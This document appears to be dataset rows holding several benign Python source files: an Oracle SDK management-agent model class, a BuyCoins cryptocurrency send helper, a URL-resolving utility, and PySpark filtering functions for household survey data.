#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "WINDOWS"
PLATFORM_TYPE_WINDOWS = "WINDOWS"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "AGENT"
INSTALL_TYPE_AGENT = "AGENT"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "GATEWAY"
INSTALL_TYPE_GATEWAY = "GATEWAY"
def __init__(self, **kwargs):
"""
Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param availability_status:
The value to assign to the availability_status property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type availability_status: str
:param platform_type:
The value to assign to the platform_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type platform_type: str
:param version:
The value to assign to the version property of this ManagementAgentAggregationDimensions.
:type version: str
:param has_plugins:
The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions.
:type has_plugins: bool
:param install_type:
The value to assign to the install_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type install_type: str
"""
self.swagger_types = {
'availability_status': 'str',
'platform_type': 'str',
'version': 'str',
'has_plugins': 'bool',
'install_type': 'str'
}
self.attribute_map = {
'availability_status': 'availabilityStatus',
'platform_type': 'platformType',
'version': 'version',
'has_plugins': 'hasPlugins',
'install_type': 'installType'
}
self._availability_status = None
self._platform_type = None
self._version = None
self._has_plugins = None
self._install_type = None
@property
def availability_status(self):
"""
Gets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The availability_status of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._availability_status
@availability_status.setter
def availability_status(self, availability_status):
"""
Sets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
:param availability_status: The availability_status of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["ACTIVE", "SILENT", "NOT_AVAILABLE"]
if not value_allowed_none_or_none_sentinel(availability_status, allowed_values):
availability_status = 'UNKNOWN_ENUM_VALUE'
self._availability_status = availability_status
@property
def platform_type(self):
"""
Gets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The platform_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._platform_type
@platform_type.setter
def platform_type(self, platform_type):
"""
Sets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
:param platform_type: The platform_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["LINUX", "WINDOWS"]
if not value_allowed_none_or_none_sentinel(platform_type, allowed_values):
platform_type = 'UNKNOWN_ENUM_VALUE'
self._platform_type = platform_type
@property
def version(self):
"""
Gets the version of this ManagementAgentAggregationDimensions.
Agent image version
:return: The version of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this ManagementAgentAggregationDimensions.
Agent image version
:param version: The version of this ManagementAgentAggregationDimensions.
:type: str
"""
self._version = version
@property
def has_plugins(self):
"""
Gets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:return: The has_plugins of this ManagementAgentAggregationDimensions.
:rtype: bool
"""
return self._has_plugins
@has_plugins.setter
def has_plugins(self, has_plugins):
"""
Sets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions.
:type: bool
"""
self._has_plugins = has_plugins
@property
def install_type(self):
"""
Gets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The install_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._install_type
@install_type.setter
def install_type(self, install_type):
"""
Sets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
:param install_type: The install_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["AGENT", "GATEWAY"]
if not value_allowed_none_or_none_sentinel(install_type, allowed_values):
install_type = 'UNKNOWN_ENUM_VALUE'
self._install_type = install_type
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| en | 0.737054 | # coding: utf-8 # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. # noqa: F401 The Aggregation of Management Agent Dimensions #: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions. #: This constant has a value of "ACTIVE" #: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions. #: This constant has a value of "SILENT" #: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions. #: This constant has a value of "NOT_AVAILABLE" #: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "LINUX" #: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "WINDOWS" #: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "AGENT" #: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions. #: This constant has a value of "GATEWAY" Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param availability_status: The value to assign to the availability_status property of this ManagementAgentAggregationDimensions. Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type availability_status: str :param platform_type: The value to assign to the platform_type property of this ManagementAgentAggregationDimensions. Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type platform_type: str :param version: The value to assign to the version property of this ManagementAgentAggregationDimensions. :type version: str :param has_plugins: The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions. :type has_plugins: bool :param install_type: The value to assign to the install_type property of this ManagementAgentAggregationDimensions. Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type install_type: str Gets the availability_status of this ManagementAgentAggregationDimensions. The availability status of managementAgent Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The availability_status of this ManagementAgentAggregationDimensions. :rtype: str Sets the availability_status of this ManagementAgentAggregationDimensions. The availability status of managementAgent :param availability_status: The availability_status of this ManagementAgentAggregationDimensions. 
:type: str Gets the platform_type of this ManagementAgentAggregationDimensions. Platform Type Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The platform_type of this ManagementAgentAggregationDimensions. :rtype: str Sets the platform_type of this ManagementAgentAggregationDimensions. Platform Type :param platform_type: The platform_type of this ManagementAgentAggregationDimensions. :type: str Gets the version of this ManagementAgentAggregationDimensions. Agent image version :return: The version of this ManagementAgentAggregationDimensions. :rtype: str Sets the version of this ManagementAgentAggregationDimensions. Agent image version :param version: The version of this ManagementAgentAggregationDimensions. :type: str Gets the has_plugins of this ManagementAgentAggregationDimensions. Whether or not a managementAgent has at least one plugin :return: The has_plugins of this ManagementAgentAggregationDimensions. :rtype: bool Sets the has_plugins of this ManagementAgentAggregationDimensions. Whether or not a managementAgent has at least one plugin :param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions. :type: bool Gets the install_type of this ManagementAgentAggregationDimensions. The install type, either AGENT or GATEWAY Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The install_type of this ManagementAgentAggregationDimensions. :rtype: str Sets the install_type of this ManagementAgentAggregationDimensions. The install type, either AGENT or GATEWAY :param install_type: The install_type of this ManagementAgentAggregationDimensions. :type: str | 1.714254 | 2 |
py_buycoins/sending.py | Bashorun97/BuyCoins-Python-SDK | 1 | 8564 | from .gcore.queries import GetNetworkFee, GetBalance
from .gcore.mutations import SendCoin
from typing import List, Optional
from .exc import SendLimitError, InvalidClientObject
class Send:
def __init__(self, address: str, cryptocurrency: str, amount: float):
self.address = address
self.cryptocurrency = cryptocurrency
self.amount = amount
limits = {
"bitcoin": 1,
"ethereum": 50,
"litecoin": 50,
"nairatoken": 2000000
}
    def execute(self, client, response_fields):
        try:
            return client.execute(query=self.send(response_fields))
except AttributeError:
raise InvalidClientObject("<BuyCoinsClient> object expected received {} instead".format(type(client)))
def get_network_fee(self, response_fields):
_price = GetNetworkFee()
return _price.queryObject(
response_fields=response_fields,
cryptocurrency=self.cryptocurrency, amount=self.amount
)
def check_limit(self):
if Send.limits[self.cryptocurrency.lower()] < self.amount:
return False
else:
return True
def send(self, response_fields):
if self.cryptocurrency.lower() in Send.limits.keys():
            if self.check_limit():
return SendCoin().Mutate(
cryptocurrency=self.cryptocurrency,
response_fields=response_fields,
amount=self.amount,
address=self.address
)
else:
raise SendLimitError("Maximum daily transaction amount exceeded")
def balance(self, response_fields: List):
return GetBalance.queryObject(response_fields=response_fields)
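# Illustrative usage sketch (editor's addition, not part of the published SDK). The client
# construction and the GraphQL response fields below are assumptions made for the example:
#
#     client = BuyCoinsClient("<api_key>")
#     tx = Send(address="<recipient_address>", cryptocurrency="bitcoin", amount=0.5)
#     fee = tx.get_network_fee(response_fields=["estimatedFee", "total"])
#     receipt = tx.execute(client, response_fields=["id", "status"])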
| from .gcore.queries import GetNetworkFee, GetBalance
from .gcore.mutations import SendCoin
from typing import List, Optional
from .exc import SendLimitError, InvalidClientObject
class Send:
def __init__(self, address: str, cryptocurrency: str, amount: float):
self.address = address
self.cryptocurrency = cryptocurrency
self.amount = amount
limits = {
"bitcoin": 1,
"ethereum": 50,
"litecoin": 50,
"nairatoken": 2000000
}
    def execute(self, client, response_fields):
        try:
            return client.execute(query=self.send(response_fields))
except AttributeError:
raise InvalidClientObject("<BuyCoinsClient> object expected received {} instead".format(type(client)))
def get_network_fee(self, response_fields):
_price = GetNetworkFee()
return _price.queryObject(
response_fields=response_fields,
cryptocurrency=self.cryptocurrency, amount=self.amount
)
def check_limit(self):
if Send.limits[self.cryptocurrency.lower()] < self.amount:
return False
else:
return True
def send(self, response_fields):
if self.cryptocurrency.lower() in Send.limits.keys():
            if self.check_limit():
return SendCoin().Mutate(
cryptocurrency=self.cryptocurrency,
response_fields=response_fields,
amount=self.amount,
address=self.address
)
else:
raise SendLimitError("Maximum daily transaction amount exceeded")
def balance(self, response_fields: List):
return GetBalance.queryObject(response_fields=response_fields)
| none | 1 | 2.350477 | 2 |
|
snippet/example/python/url.py | yp2800/snippet | 94 | 8565 |
# -*- coding: utf-8 -*-
try:
from urlparse import urlparse, urlunsplit
except ImportError:
from urllib.parse import urlparse, urlunsplit
class URL(object):
DEFAULT_SCHEME = ["http", "https"]
def __init__(self, url, allowed_scheme=None):
self._url = url
self.url = urlparse(self._url)
self._scheme = allowed_scheme if allowed_scheme else self.DEFAULT_SCHEME
def geturl(self):
scheme = self.scheme if self.scheme else self.url.scheme
netloc = self.netloc if self.netloc else self.url.netloc
url = self.path if self.path else self.url.path
params = self.params if self.params else self.url.params
query = self.query if self.query else self.url.query
fragment = self.fragment if self.fragment else self.url.fragment
if params:
url = "%s;%s" % (url, params)
return urlunsplit((scheme, netloc, url, query, fragment))
def get_full_url(self, base=None):
return self.s_get_full_url(self, base)
@staticmethod
def s_get_full_url(url, base=None):
if not base:
if url.scheme in url._scheme:
return url.geturl()
return None
if not url.scheme:
url.scheme = base.scheme
if url.scheme not in url._scheme:
return None
if not url.netloc:
url.netloc = base.netloc
if len(url.path) == 1 and url.path == '/':
return None
if url.path[0] != '/':
path = base.path.split('/')[:-1]
path.append(url.path)
url.path = '/'.join(path)
return url.geturl()
def __getattr__(self, name):
if name == "path":
path = getattr(self.url, name)
if not path:
return '/'
return path
return getattr(self.url, name)
def __setattr__(self, name, value):
object.__setattr__(self, name, value)
def __repr__(self):
s = "URL(scheme='%s', netloc='%s', path='%s', params='%s', query='%s', fragment='%s')"
p = (self.scheme, self.netloc, self.path, self.params, self.query, self.fragment)
return s % p
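# Minimal usage sketch (editor's addition): resolve a relative link against a base URL.
if __name__ == "__main__":
    base = URL("https://example.com/docs/index.html")
    link = URL("guide.html")
    # Expected to print: https://example.com/docs/guide.html
    print(link.get_full_url(base))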
| # -*- coding: utf-8 -*-
try:
from urlparse import urlparse, urlunsplit
except ImportError:
from urllib.parse import urlparse, urlunsplit
class URL(object):
DEFAULT_SCHEME = ["http", "https"]
def __init__(self, url, allowed_scheme=None):
self._url = url
self.url = urlparse(self._url)
self._scheme = allowed_scheme if allowed_scheme else self.DEFAULT_SCHEME
def geturl(self):
scheme = self.scheme if self.scheme else self.url.scheme
netloc = self.netloc if self.netloc else self.url.netloc
url = self.path if self.path else self.url.path
params = self.params if self.params else self.url.params
query = self.query if self.query else self.url.query
fragment = self.fragment if self.fragment else self.url.fragment
if params:
url = "%s;%s" % (url, params)
return urlunsplit((scheme, netloc, url, query, fragment))
def get_full_url(self, base=None):
return self.s_get_full_url(self, base)
@staticmethod
def s_get_full_url(url, base=None):
if not base:
if url.scheme in url._scheme:
return url.geturl()
return None
if not url.scheme:
url.scheme = base.scheme
if url.scheme not in url._scheme:
return None
if not url.netloc:
url.netloc = base.netloc
if len(url.path) == 1 and url.path == '/':
return None
if url.path[0] != '/':
path = base.path.split('/')[:-1]
path.append(url.path)
url.path = '/'.join(path)
return url.geturl()
def __getattr__(self, name):
if name == "path":
path = getattr(self.url, name)
if not path:
return '/'
return path
return getattr(self.url, name)
def __setattr__(self, name, value):
object.__setattr__(self, name, value)
def __repr__(self):
s = "URL(scheme='%s', netloc='%s', path='%s', params='%s', query='%s', fragment='%s')"
p = (self.scheme, self.netloc, self.path, self.params, self.query, self.fragment)
return s % p | en | 0.769321 | # -*- coding: utf-8 -*- | 2.976561 | 3 |
netvisor_api_client/services/dimension.py | tristen-tooming/netvisor-api-client | 0 | 8566 | from .base import Service
from ..requests.dimension import CreateDimensionsRequest, DimensionsListRequest
class DimensionService(Service):
def create(self, data):
request = CreateDimensionsRequest(
self.client,
params={'method': 'add'},
data=data
)
return request.make_request()
def list(self, showhidden=None):
request = DimensionsListRequest(self.client,
params={'showhidden': showhidden})
return request.make_request() | from .base import Service
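# Illustrative usage sketch (editor's addition); how the client is constructed and the exact
# payload accepted by the Netvisor API are assumptions, not taken from this repository:
#
#     service = DimensionService(client)
#     service.create({"name": "Project", "item": {"name": "Website redesign"}})
#     service.list(showhidden=1)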
from ..requests.dimension import CreateDimensionsRequest, DimensionsListRequest
class DimensionService(Service):
def create(self, data):
request = CreateDimensionsRequest(
self.client,
params={'method': 'add'},
data=data
)
return request.make_request()
def list(self, showhidden=None):
request = DimensionsListRequest(self.client,
params={'showhidden': showhidden})
return request.make_request() | none | 1 | 2.619974 | 3 |
|
cishouseholds/filter.py | ONS-SST/cis_households | 0 | 8567 |
from typing import List
from typing import Union
from pyspark.sql import DataFrame
from pyspark.sql import functions as F
from pyspark.sql.window import Window
def filter_all_not_null(df: DataFrame, reference_columns: List[str]) -> DataFrame:
"""
Filter rows which have NULL values in all the specified columns.
From households_aggregate_processes.xlsx, filter number 2.
Parameters
----------
df
reference_columns
Columns to check for missing values in, all
must be missing for the record to be dropped.
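    Example
    -------
    Illustrative only; assumes an active SparkSession named ``spark``::

        df = spark.createDataFrame([(1, None, None), (2, "a", None)], ["id", "x", "y"])
        filter_all_not_null(df, ["x", "y"])  # drops row 1, where x and y are both null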
"""
return df.na.drop(how="all", subset=reference_columns)
def filter_duplicates_by_time_and_threshold(
df: DataFrame,
first_reference_column: str,
second_reference_column: str,
third_reference_column: str,
fourth_reference_column: str,
time_threshold: float = 1.5,
float_threshold: float = 0.00001,
) -> DataFrame:
"""
    Drop duplicate records that share identical values in the first two columns, where the third and
    fourth columns are both within a threshold difference of the first record in the duplicate group.
From households_aggregate_processes.xlsx, filter number 4.
Parameters
----------
df
first_reference_column
First column with duplicate value
second_reference_column
Second column with duplicate value
third_reference_column
Column used for time based threshold difference, timestamp
fourth_reference_column
Column used for numeric based threshold difference, float
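    Example
    -------
    Illustrative call; the column names are placeholders, not taken from the real survey data::

        filter_duplicates_by_time_and_threshold(
            df, "participant_id", "visit_id", "visit_datetime", "temperature"
        )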
"""
window = Window.partitionBy(first_reference_column, second_reference_column).orderBy(third_reference_column)
df = df.withColumn("duplicate_id", F.row_number().over(window))
df = df.withColumn(
"within_time_threshold",
(
F.abs(
F.first(third_reference_column).over(window).cast("long") - F.col(third_reference_column).cast("long")
)
/ (60 * 60)
)
< time_threshold,
)
df = df.withColumn(
"within_float_threshold",
F.abs(F.first(fourth_reference_column).over(window) - F.col(fourth_reference_column)) < float_threshold,
)
df = df.filter((F.col("duplicate_id") == 1) | ~(F.col("within_time_threshold") & (F.col("within_float_threshold"))))
return df.drop("duplicate_id", "within_time_threshold", "within_float_threshold")
def filter_by_cq_diff(
df: DataFrame, comparing_column: str, ordering_column: str, tolerance: float = 0.00001
) -> DataFrame:
"""
    This function treats rows as duplicates when their value in the comparing column differs by less
    than 10^-5 (0.00001, or any other tolerance provided), given that all the other columns are the
    same, and keeps only the first such entry, dropping the repeated values.
Parameters
----------
df
comparing_column
ordering_column
tolerance
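    Example
    -------
    Illustrative call; the column names are placeholders::

        filter_by_cq_diff(df, comparing_column="cq_value", ordering_column="result_datetime")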
"""
column_list = df.columns
column_list.remove(comparing_column)
windowSpec = Window.partitionBy(column_list).orderBy(ordering_column)
df = df.withColumn("first_value_in_duplicates", F.first(comparing_column).over(windowSpec))
df = df.withColumn(
"duplicates_first_record", F.abs(F.col("first_value_in_duplicates") - F.col(comparing_column)) < tolerance
)
difference_window = Window.partitionBy(column_list + ["duplicates_first_record"]).orderBy(ordering_column)
df = df.withColumn("duplicate_number", F.row_number().over(difference_window))
df = df.filter(~(F.col("duplicates_first_record") & (F.col("duplicate_number") != 1)))
df = df.drop("first_value_in_duplicates", "duplicates_first_record", "duplicate_number")
return df
def assign_date_interval_and_flag(
df: DataFrame,
column_name_inside_interval: str,
column_name_time_interval: str,
start_datetime_reference_column: str,
end_datetime_reference_column: str,
lower_interval: Union[int, float],
upper_interval: Union[int, float],
interval_format: str = "hours",
) -> DataFrame:
"""
    This function computes the time interval, in either hours (by default) or days,
    between two given date columns and flags whether that interval falls inside an
    upper and lower bound. If the difference between the dates is within the upper
    and lower intervals the flag column is set to None; if the difference falls
    outside of those intervals the flag column is set to the integer 1.
Parameters
----------
df
column_name_inside_interval
Name of the column that returns whether the difference in dates are
within the upper/lower limits if within, it will return None, if outside
will return an integer 1.
column_name_time_interval
Name of the column that returns the difference between start and end
date and adds at the end of the column name whether it is in hours or
days
start_datetime_reference_column
Earliest date in string format yyyy-mm-dd hh:mm:ss.
end_datetime_reference_column
Latest date in string format yyyy-mm-dd hh:mm:ss.
    lower_interval
        The maximum NEGATIVE time difference allowed between
        end_datetime_reference_column and start_datetime_reference_column,
        i.e. how much earlier end_datetime_reference_column may be than
        start_datetime_reference_column.
    upper_interval
        The maximum POSITIVE time difference allowed between
        end_datetime_reference_column and start_datetime_reference_column.
interval_format
By default will be a string called 'hours' if upper and lower
intervals are input as days, define interval_format to 'days'.
These are the only two possible formats.
Notes
-----
Lower_interval should be a negative value if start_datetime_reference_column
is after end_datetime_reference_column."""
# by default, Hours but if days, apply change factor
if interval_format == "hours": # to convert hours to seconds
conversion_factor = 3600 # 1h has 60s*60min seconds = 3600 seconds
elif interval_format == "days":
conversion_factor = 86400 # 1 day has 60s*60min*24h seconds = 86400 seconds
column_name_time_interval = column_name_time_interval + "_" + interval_format
# FORMULA: (end_datetime_reference_column - start_datetime_reference_column) in
# seconds/conversion_factor in seconds
df = df.withColumn(
column_name_time_interval,
(
F.to_timestamp(F.col(end_datetime_reference_column)).cast("long")
- F.to_timestamp(F.col(start_datetime_reference_column)).cast("long")
)
/ conversion_factor, # 1 day has 60s*60min*24h seconds = 86400 seconds
)
return df.withColumn(
column_name_inside_interval,
F.when(~F.col(column_name_time_interval).between(lower_interval, upper_interval), 1).otherwise(None),
)
def file_exclude(df: DataFrame, source_file_col: str, files_to_exclude: list):
"""
Function to exclude specific files from pipeline processing
    Parameters
    ----------
    df
    source_file_col
        Column in the input dataframe which contains the source file name
    files_to_exclude
        List of files to exclude (fed in from config)
"""
for item in files_to_exclude:
df = df.filter(~F.col(source_file_col).isin(item))
return df
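# Illustrative usage sketch (editor's addition); assumes an existing DataFrame of survey responses
# and placeholder column names, which are not taken from the real pipeline configuration:
#
#     responses = filter_all_not_null(responses, ["swab_barcode", "blood_barcode"])
#     responses = assign_date_interval_and_flag(
#         responses,
#         column_name_inside_interval="outside_interval_flag",
#         column_name_time_interval="visit_to_result",
#         start_datetime_reference_column="visit_datetime",
#         end_datetime_reference_column="result_datetime",
#         lower_interval=-24,
#         upper_interval=48,
#     )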
| from typing import List
from typing import Union
from pyspark.sql import DataFrame
from pyspark.sql import functions as F
from pyspark.sql.window import Window
def filter_all_not_null(df: DataFrame, reference_columns: List[str]) -> DataFrame:
"""
Filter rows which have NULL values in all the specified columns.
From households_aggregate_processes.xlsx, filter number 2.
Parameters
----------
df
reference_columns
Columns to check for missing values in, all
must be missing for the record to be dropped.
"""
return df.na.drop(how="all", subset=reference_columns)
def filter_duplicates_by_time_and_threshold(
df: DataFrame,
first_reference_column: str,
second_reference_column: str,
third_reference_column: str,
fourth_reference_column: str,
time_threshold: float = 1.5,
float_threshold: float = 0.00001,
) -> DataFrame:
"""
    Drop duplicate records that share identical values in the first two columns, where the third and
    fourth columns are both within a threshold difference of the first record in the duplicate group.
From households_aggregate_processes.xlsx, filter number 4.
Parameters
----------
df
first_reference_column
First column with duplicate value
second_reference_column
Second column with duplicate value
third_reference_column
Column used for time based threshold difference, timestamp
fourth_reference_column
Column used for numeric based threshold difference, float
"""
window = Window.partitionBy(first_reference_column, second_reference_column).orderBy(third_reference_column)
df = df.withColumn("duplicate_id", F.row_number().over(window))
df = df.withColumn(
"within_time_threshold",
(
F.abs(
F.first(third_reference_column).over(window).cast("long") - F.col(third_reference_column).cast("long")
)
/ (60 * 60)
)
< time_threshold,
)
df = df.withColumn(
"within_float_threshold",
F.abs(F.first(fourth_reference_column).over(window) - F.col(fourth_reference_column)) < float_threshold,
)
df = df.filter((F.col("duplicate_id") == 1) | ~(F.col("within_time_threshold") & (F.col("within_float_threshold"))))
return df.drop("duplicate_id", "within_time_threshold", "within_float_threshold")
def filter_by_cq_diff(
df: DataFrame, comparing_column: str, ordering_column: str, tolerance: float = 0.00001
) -> DataFrame:
"""
This function works out what columns have a float value difference less than 10-^5 or 0.00001
(or any other tolerance value inputed) given all the other columns are the same and
considers it to be the same dropping or deleting the repeated values and only keeping one entry.
Parameters
----------
df
comparing_column
ordering_column
tolerance
"""
column_list = df.columns
column_list.remove(comparing_column)
windowSpec = Window.partitionBy(column_list).orderBy(ordering_column)
df = df.withColumn("first_value_in_duplicates", F.first(comparing_column).over(windowSpec))
df = df.withColumn(
"duplicates_first_record", F.abs(F.col("first_value_in_duplicates") - F.col(comparing_column)) < tolerance
)
difference_window = Window.partitionBy(column_list + ["duplicates_first_record"]).orderBy(ordering_column)
df = df.withColumn("duplicate_number", F.row_number().over(difference_window))
df = df.filter(~(F.col("duplicates_first_record") & (F.col("duplicate_number") != 1)))
df = df.drop("first_value_in_duplicates", "duplicates_first_record", "duplicate_number")
return df
def assign_date_interval_and_flag(
df: DataFrame,
column_name_inside_interval: str,
column_name_time_interval: str,
start_datetime_reference_column: str,
end_datetime_reference_column: str,
lower_interval: Union[int, float],
upper_interval: Union[int, float],
interval_format: str = "hours",
) -> DataFrame:
"""
This function gives the time interval in either hours (by default) or days
in a column by given two date columns and says whether it is inside and
upper and lower interval. If the difference of dates is within the upper and
lower time intervals, the function will output None and an integer 1 if the
difference in dates are outside of those intervals.
Parameters
----------
df
column_name_inside_interval
Name of the column that returns whether the difference in dates are
within the upper/lower limits if within, it will return None, if outside
will return an integer 1.
column_name_time_interval
Name of the column that returns the difference between start and end
date and adds at the end of the column name whether it is in hours or
days
start_datetime_reference_column
Earliest date in string format yyyy-mm-dd hh:mm:ss.
end_datetime_reference_column
Latest date in string format yyyy-mm-dd hh:mm:ss.
lower_interval
Marks how much NEGATIVE time difference can have between
end_datetime_reference_column and start_datetime_reference_column.
Meaning how the end_datetime_reference_column can be earlier than
start_datetime_reference_column
upper_interval
Marks how much POSITIVE time difference can have between
end_datetime_reference_column and start_datetime_reference_column
interval_format
By default will be a string called 'hours' if upper and lower
intervals are input as days, define interval_format to 'days'.
These are the only two possible formats.
Notes
-----
Lower_interval should be a negative value if start_datetime_reference_column
is after end_datetime_reference_column."""
# by default, Hours but if days, apply change factor
if interval_format == "hours": # to convert hours to seconds
conversion_factor = 3600 # 1h has 60s*60min seconds = 3600 seconds
elif interval_format == "days":
conversion_factor = 86400 # 1 day has 60s*60min*24h seconds = 86400 seconds
column_name_time_interval = column_name_time_interval + "_" + interval_format
# FORMULA: (end_datetime_reference_column - start_datetime_reference_column) in
# seconds/conversion_factor in seconds
df = df.withColumn(
column_name_time_interval,
(
F.to_timestamp(F.col(end_datetime_reference_column)).cast("long")
- F.to_timestamp(F.col(start_datetime_reference_column)).cast("long")
)
/ conversion_factor, # 1 day has 60s*60min*24h seconds = 86400 seconds
)
return df.withColumn(
column_name_inside_interval,
F.when(~F.col(column_name_time_interval).between(lower_interval, upper_interval), 1).otherwise(None),
)
def file_exclude(df: DataFrame, source_file_col: str, files_to_exclude: list):
"""
Function to exclude specific files from pipeline processing
Parameters
--------
df
source_file_column = Column in input dataframe which contains the source file
files_to_exclude = List of files to exclude (feed in from config)
"""
for item in files_to_exclude:
df = df.filter(~F.col(source_file_col).isin(item))
return df | en | 0.709229 | Filter rows which have NULL values in all the specified columns. From households_aggregate_processes.xlsx, filter number 2. Parameters ---------- df reference_columns Columns to check for missing values in, all must be missing for the record to be dropped. Drop duplicates based on two identitical column values if third and fourth column and not both within a threshold difference from the first duplicate record. From households_aggregate_processes.xlsx, filter number 4. Parameters ---------- df first_reference_column First column with duplicate value second_reference_column Second column with duplicate value third_reference_column Column used for time based threshold difference, timestamp fourth_reference_column Column used for numeric based threshold difference, float This function works out what columns have a float value difference less than 10-^5 or 0.00001 (or any other tolerance value inputed) given all the other columns are the same and considers it to be the same dropping or deleting the repeated values and only keeping one entry. Parameters ---------- df comparing_column ordering_column tolerance This function gives the time interval in either hours (by default) or days in a column by given two date columns and says whether it is inside and upper and lower interval. If the difference of dates is within the upper and lower time intervals, the function will output None and an integer 1 if the difference in dates are outside of those intervals. Parameters ---------- df column_name_inside_interval Name of the column that returns whether the difference in dates are within the upper/lower limits if within, it will return None, if outside will return an integer 1. column_name_time_interval Name of the column that returns the difference between start and end date and adds at the end of the column name whether it is in hours or days start_datetime_reference_column Earliest date in string format yyyy-mm-dd hh:mm:ss. end_datetime_reference_column Latest date in string format yyyy-mm-dd hh:mm:ss. lower_interval Marks how much NEGATIVE time difference can have between end_datetime_reference_column and start_datetime_reference_column. Meaning how the end_datetime_reference_column can be earlier than start_datetime_reference_column upper_interval Marks how much POSITIVE time difference can have between end_datetime_reference_column and start_datetime_reference_column interval_format By default will be a string called 'hours' if upper and lower intervals are input as days, define interval_format to 'days'. These are the only two possible formats. Notes ----- Lower_interval should be a negative value if start_datetime_reference_column is after end_datetime_reference_column. # by default, Hours but if days, apply change factor # to convert hours to seconds # 1h has 60s*60min seconds = 3600 seconds # 1 day has 60s*60min*24h seconds = 86400 seconds # FORMULA: (end_datetime_reference_column - start_datetime_reference_column) in # seconds/conversion_factor in seconds # 1 day has 60s*60min*24h seconds = 86400 seconds Function to exclude specific files from pipeline processing Parameters -------- df source_file_column = Column in input dataframe which contains the source file files_to_exclude = List of files to exclude (feed in from config) | 3.358688 | 3 |
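# Self-contained demo of file_exclude, kept behind a __main__ guard so importing the
# module is unaffected. This is an illustrative sketch only: it assumes a local
# pyspark installation and uses made-up file names.
if __name__ == "__main__":
    from pyspark.sql import SparkSession

    spark = SparkSession.builder.master("local[1]").appName("file_exclude_demo").getOrCreate()
    demo_df = spark.createDataFrame(
        [(1, "survey_v1.csv"), (2, "survey_v2.csv"), (3, "bad_extract.csv")],
        ["record_id", "source_file"],
    )
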